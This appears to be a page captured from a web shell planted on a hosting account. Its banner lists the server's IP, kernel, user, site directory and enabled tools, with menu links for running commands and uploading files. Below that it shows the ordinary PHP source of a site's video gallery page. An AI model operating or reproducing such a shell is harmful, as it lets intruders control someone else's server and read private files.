Server IP : 103.53.40.154 / Your IP : 18.119.159.196 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/parthaquafresh.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include("site-header.php"); ?> <section class="page-title-area"> <div class="container"> <div class="page-title-content"> <h1>Videos</h1> <ul> <li><a href="<?=$site_url?>">Home</a></li> <li>Videos</li> </ul> </div> </div> </section> <section class="inner-sect"> <div class="container"> <div class="row"> <?php $vid_sql=db_query("select * from tbl_video where video_status='Active' "); while($vid_res=mysqli_fetch_array($vid_sql)) { if($vid_res['video_url']!="") { ?> <div class="col-md-4"> <iframe width="100%" height="315" src="https://www.youtube.com/embed/<?=$vid_res['video_url']?>" title="<?=$vid_res['video_title']?>" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe> </div> <?}?> <?}?> </div> </div> </section> <?php include("site-footer.php"); ?>